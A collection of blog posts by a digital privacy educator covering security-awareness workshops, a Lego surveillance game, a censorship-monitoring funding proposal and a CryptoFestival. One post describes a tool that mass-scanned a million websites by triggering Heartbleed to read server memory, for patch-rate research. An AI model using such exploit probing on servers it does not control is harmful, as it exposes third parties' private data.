Digital Stalking Response Protocol @ 32C3

I introduced the idea of a Pan-European Digital Stalking Response Protocol at the #32C3 Chaos Communication Congress, the biggest hacker conference in Europe (talk begins at 30.08 in the video)

There no simple go to place for real information wrt to protection and response to cases of digital stalking, but also the information needed is very country specific. However there are clear areas that need to be addressed, regardless of country, and we propose the creation of a Pan-European protocol on digital stalking which we will begin at a self organised session here at 32C3.

Speaking at #insafe2015

IMG_20151210_085524

Last week I did two workshops for the insafe training meeting in Warsaw (photo above taken from venue).

Insafe training meetings provide an opportunity for members of the network of European Safer Internet Centres (awareness raising, helplines and youth participation) to come together to discuss the latest trends in online safety issues, and share experiences and best practice examples of empowering children and young people to stay safe online.

My 2 sessions were:

I’ve been hacked”
Hacking, social engineering & pervasive algorithms

But have you actually been hacked? Or have you been socially engineered?
This workshop will explore the differences and similarities between the two and also look at how we may think we have agency in our decisions but often pervasive algorithms are determining what we can and can’t do.

We Can Haz ALL your information
Wearables, IoT and Big Data

As even more of our data is going to be made available through wearables and the “Internet of Things”, this workshop will look at the risks and realities behind the hype.

Digital First Aid

erstehilfe

How can we get the general public thinking and doing something about security and their online presence? One way is to actually go out to where the general public actually are and engage with them in a way which strips away the techno babble and specialist vocabulary.

BEE SECURE is the part of an organisation called SMILE (Security Made In Lëtzebuerg) whose remit is to increase awareness of security in the digital field and promote safer internet practises for the general public (the other two branches are CASES which reaches out to business and CIRCL – the Computer Incident Response Center Luxembourg, a government-driven initiative designed to provide a systematic response facility to computer security threats and incidents).

I’ve been working with BEE SECURE on the idea of Digital First Aid to be carried out at public events and possibly in schools, where BEE SECURE already carry out a lot of training.

cloud

So, the idea finally was to have a “Digital First Aid” post under the title of #BeeFirstAid where we are dressed as first responders and carry out a quick check on devices of members of the public. Like a medical centre, we have some posters about current issues, which are here on this page.

passwordphishing

After carrying out the brief first aid, mainly on passwords, wifi permissions and cloud permissions, we give the “patient” a prescription (see image below) of things to carry out over the next week, and recommend that for further “treatment” they visit a Digital Privacy Salon and/or the local  syn2cat hackerspace
bfah4k1
ord

Panopticon: a game of data & control

panopticon-logo-v3-black

20140728_115103

Panopticon is a creative commons licensed, open source game in constant development, meaning that anyone can take the game and adapt it to their own needs. The game grew out of conversations between Maf’j and Chris which Maf’j blogged about:

Met Chris pinchen from Cataspanglish who is currently resident at Lighthouse. He introduced us to Techno Activism at the launch of #TA3MBTN. It was a great event of eye-opening ideas around data retention by governments, surveillance, Prism and educating the public about open data and data protection. Chris and co run Cryptoparty. An event which brings people together to learn more about how to protect their identity and their online shadows and data. We talked about the next Cryptoparty which is on Sunday 1st December. How do you make a tech event more family friendly? we talked about Rootbeans. A version of the game that could be fun, relevant to younger players but exploring the issues core to crypto party.

After a bit of twitter ping pong we came up with Lego Panopticon. In this game players use lego bricks to build surveillance structures by connecting to each other and exchanging ‘bits’. Players with the tallest towers can see the furthest and can therefore ‘help’ the most when it comes to informing other players with valuable information further away from their own vantage point. Becoming the Google or Facebook of the game. We’ll have to meet up and hash this out but it’s exciting.

We met up at Lighthouse and Maf’j already had a version of the game that we could work on. Natalie Kane contributed the mission cards and player descriptions during and after the session and further development has taken place by playing the game at various events and incorporating player feedback into the game rules.

We used Lego as it is cheap and ubiquitous and people automatically know what to do with it. The baseboard can be made from anything, just needing to be laid out as described in the rules. We used the Lego pieces we had to hand (well, those that we could “borrow” from our kids), so you can replace them with any you have available.

Currently we have plans to develop the game for other contexts, do a Minecraft version, a Raspberry Pi Minecraft version and to incorporate it into the Coder Dojo in Luxembourg as well as continuing to develop it through playing. We’d love to see what others do with the game and if you want any further information please get in touch.

Oh yes, stickers and t-shirts will be available soon….

lego-panopticon

1st version of the game

 

original

1st playing of the game at Brighton CryptoFestival

 

BjaSE_XIgAAGkRD

Playing the game at DoubleBlink R&D weekend

 

20140728_115103

Demonstrating the game at Bee Secure

Pacemaker – a #HeartBleed probing utility

Here’s a really cool quick & dirty utility that Chokepoint has made:
pacemaker

Pacemaker is a utility that scans the Alexa Top 1 million websites [1] and attempts to connect to their port 443. If this succeeds, Pacemaker tries to inject the HeartBleed [2] vulnerability (http://heartbleed.com/) in order to retrieve data from the servers’ memory. An initial scan was performed on April 11th, where approximately 30 000 vulnerable websites were uncovered. Since then, Chokepoint Project have been re-scanning those URLs to see whether they have been patched, and that number has shrunk by about 10 000.

By now we all know how serious an issue heartbleed is, affecting nearly all aspects of our use of networks. We were very interested to know more about the rate of adoption of patch implementation. Despite the very good adoption in the Alexa top 1 Million, given the severity of this particular bug it is a little depressing to see that at the time of writing (2014-04-15 20:24:08.) there are still 19721 sites unpatched. This might seem like a small number, but given that there are more than 246 million domains in the world and we have scanned only the top 1 Million according to Alexa, and have only scanned for webservers not for anything else, it is not unlikely that there might still be more than 5 million unpatched systems out there” said Chokepoint Project´s Ruben Bloemgarten.

 

What Pacemaker does not do :

The URL probing tool has a 5 second timeout to complete the request. If said request does not return within that time frame, it is marked as unresponsive, and therefore not considered vulnerable anymore. These timed out urls are not rechecked afterwards. In the same vein, it would be interesting to keep scanning the total of 1 million urls in case servers have been patched temporarily but are now again vulnerable, or some site owners took the website down (timing out the request, or failing) but failed to patch properly. URLs that do not have SSL are also marked as non-vulnerable and currently not re-checked. For full details, see https://github.com/l-r/heartbleed-masstest.

 

[1] About Alexa

Alexa Internet, Inc. is a subsidiary company of Amazon.com which provides commercial web traffic data. Its toolbar collects data on browsing behavior and transmits it to the Alexa website, where it is stored and analyzed, forming the basis for the company’s web traffic reporting. As of 2014, Alexa provides traffic data, global rankings and other information on 30 million websites, and its website is visited by over 8.8 million people monthly. https://en.wikipedia.org/wiki/Alexa_Internet

[2] About Heartbleed

Heartbleed is a security bug in the open-source OpenSSL cryptography library, widely used to implement the Internet’s Transport Layer Security (TLS) protocol. This vulnerability is due to a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension. http://en.wikipedia.org/wiki/Heartbleed

Knight News Challenge proposal

Chokepoint’s joint proposal with OONI has made it to the “semi-finals” of the Knight News Challenge. The theme is How can we strengthen the Internet for free expression and innovation? The proposal is posted below but please head over to our Knight challenge page and “applaud” it. 🙂

Global Internet Monitoring Project

The internet’s potential as a medium for innovation and self-expression is hampered by increasingly invasive surveillance and censorship practices, which stifle the freedom of expression and the empowerment of marginalized voices worldwide. The incidental, anecdotal reporting on these practices is insufficient to provide policy makers, researchers and the general public with a comprehensive perspective on the scope and reach of these practices. Our goal is to provide a monitoring platform that delivers structured, up-to-date information that reflects the reality of internet censorship and surveillance, using open software, an ethical data governance framework, and peer reviewed methodologies.
knight

With the rapid growth of censorship and surveillance practices that directly or indirectly violate civil and human rights, it has become of vital importance to augment our incidental and anecdotal understanding of these practices with on-going, evidence-based reporting on what is actually happening on our networks. To achieve this requires a globally distributed network of standardized network measurement nodes, as well as powerful analysis and visualization tools.

We, the Tor project and Chokepoint Project, have over the past two years amassed extensive technical and domain-specific expertise on the detection, analysis and reporting of surveillance and censorship events. The Tor Project has been developing open standards, software and a methodology for conducting measurements. Chokepoint Project has been working on near real-time processing, analysis, visualization and contextualization of this type of data.

For this proposal, we aim to extend, improve and integrate the existing software systems and analysis tools, with the goal of enabling more comprehensive, evidence-based, and up-to-date reporting on censorship and surveillance events. Our proposal works towards this goal with a three-pronged approach:

1. Expand and improve Tor’s ooni-probe software suite, which provides the basic infrastructure to support a globally distributed measurement network.

  • Support for running ooniprobe on raspberry pi devices.
  • Running tests periodically, making ooniprobe a system daemon.
  • Support for remotely provisioning probes with tests and inputs to run based on their geographical location and ASN.

2. Integrate and enhance Chokepoint’s data analysis and visualization tools, to incorporate and report on data from the ooniprobe software suite.

  • Automated processing of ooniprobe yaml reports.
  • Automated analysis of ooniprobe yaml reports.
  • Automated collection of ooniprobe yaml reports
  • Support for automated generation of analytics visualization and analytic data downloads.

3. Reach out to Tor’s and Chokepoint’s extensive list of contacts to plan the deployment of ooniprobes “on the ground”, in a selected set of 10 to 20 countries.

  • Survey creation and distribution to determine country specific internet use
  • User feedback features
  • Training material
  • Plan for software distribution

Since no country is alike, and internet use is equally diverse, any measurement needs to be contextualized into a regional socio-political framework. Surveys will be distributed to on-the-ground partner organizations to construct a measurement methodology that yields culturally relevant results.

In ONE sentence, tell us about your project to strengthen the Internet for free expression and innovation.
We believe that open and continuous knowledge detailing the innards of internet censorship reveals the cost it encumbers to freedom of expression and global innovation.

 

Who will benefit from what you propose? What have you observed that makes you think that?
We believe that access to up-to-date, properly contextualized, empirically verifiable information on surveillance and censorship benefits policy makers, researchers and the general public. Currently, this information, if it is available at all, is extremely fragmented, out of date, and/or unverifiable. While the past years have seen some laudable efforts on the part of influential actors to share more information more broadly, they do not generally meet the requirements of broad (geographical) scope, timeliness, and verifiability. Since it is imperative that decisions influencing internet freedom are formulated based on facts rather than anecdotal reports, policy makers will benefit from the ability to focus on actual, rather than suspected (or merely publicized), issues. Furthermore, researchers, in particular those who explore the socio-political ramifications of the internet within the context of freedom of expression and the right to privacy, will benefit from open access to a large repository of continuously updated information. Finally, the general public will benefit, by gaining a deeper understanding and increased awareness of the prevalence of internet censorship and surveillance in their local communities and worldwide. Having spoken extensively to both policy makers and researchers over the past two years, and noting the impact of high profile intelligence revelations on public discourse worldwide, we have been strengthened in our conviction that access to timely, verifiable information, presented in an understandable fashion, is paramount to preserve the internet’s capability for innovation and self-expression in a globally connected world.

 

What progress have you made so far?
The Tor Project has developed a tool for collecting the measurements (https://gitweb.torproject.org/ooni-probe.git, https://gitweb.torproject.org/ooni-backend.git), a peer reviewed paper published (https://www.usenix.org/conference/foci12/workshop-program/presentation/filast%C3%B2) on the methodology used, specifications of the data format and the tests (https://github.com/TheTorProject/ooni-spec) and collected some results from a set of countries (https://ooni.torproject.org/reports/0.1/). Chokepoint Project has developed and is running a platform for the collection, processing, analysis and contextual presentation of data from multiple sources in near real-time, some live results can be seen here: https://beta.chokepointproject.net/country/CN?show=2014-03-13 , code is not publicly available as yet, it consists of collection, processing and analytics code as well as a distributable graphic presentation front-end. More about the Chokepoint Project´s approach here: https://chokepointproject.net/about-2/

 

What would be a successful outcome for your idea or project?
Improvement of the mitigation of censorship and interference, providing faster actionable information for policy makers, tool makers, publishers and journalists to counteract impediments on free speech and innovation. An improved, continuously up-to-date overview of what is censored where, how and by whom.

 
Who is on your team, and what are their relevant experiences or skills?
Arturo Filastò He is a developer at GlobaLeaks and The Tor Project. He studied Mathematics and is currently student of Computer Science at Università di Roma “La Sapienza”. He is a well known security researcher and regularly gives lectures at international conferences. He has trained activists in the use of security and censorship circumvention technologies. He is also the lead developer of OONI (Open Observatory of Network Interference), a project aimed at detecting and monitoring censorship in the world.

Pascal Haakmat Is an analyst at Chokepoint Project. He has studied Artificial Intelligence at the University of Amsterdam and is currently studying Law at the University of Amsterdam. He has several decades of experience as a programmer in both free/open source and proprietary environments. Prior to working at Chokepoint, Pascal has been employed as co-founder and CTO of the digital agency Lightmaker Amsterdam.

Ruben Bloemgarten is architect at Chokepoint Project. He has over 18 years of experience in information technology, the past 15 years as a systems engineer in the telecom industry and as an independent systems architect.

Laurier Rochon is a developer at Chokepoint Project. He has studied the socio-political impacts of Free Libre Open Source Software in the Networked Media Program of Rotterdam’s Piet Zwart Institute. He has experience working on both FLOSS and prorietary projects for the last 10 years.

Location

Rome, Italy; Amsterdam, The Netherlands; Montreal, Quebec, Canada

#CryptoFestBTN Decrypted

cryptofestbtn

Two weeks have flown by since Brighton CryptoFestival which I organised in collaboration with Lighthouse and Open Rights Group. Based around the idea of

“Critical thinking & practical privacy in an age of mass surveillance”

and inspired by London CryptoFestival, Brighton CryptoParty & Festival aimed to encourage critical thinking about technology, data, surveillance, censorship and privacy as well as offer practical tips, tools and behaviour.

The CryptoFestival was free and intended for everyone; no prior technical expertise or knowledge was assumed. In general the Festival achieved what it set out to do and I’m particularly pleased that the inclusion of kids and families was picked up on, being highlighted before the day itself in posts such as Making CryptoParties Inclusive in the Open Rights Group Zine & Brighton web users offered online security tips in the Brighton & Hove News.

As well as talks and the 1st Brighton CryptoParty, the Festival also featured the first playing of the prototype of Lego Panopticon, a game developed with  Maf’j Alvarez.

I was going to write up the event, but other people have already done it so much better:

Thanks to everybody who spoke on the day, the CryptoParty volunteers, Open Rights Group, and the Lighthouse crew.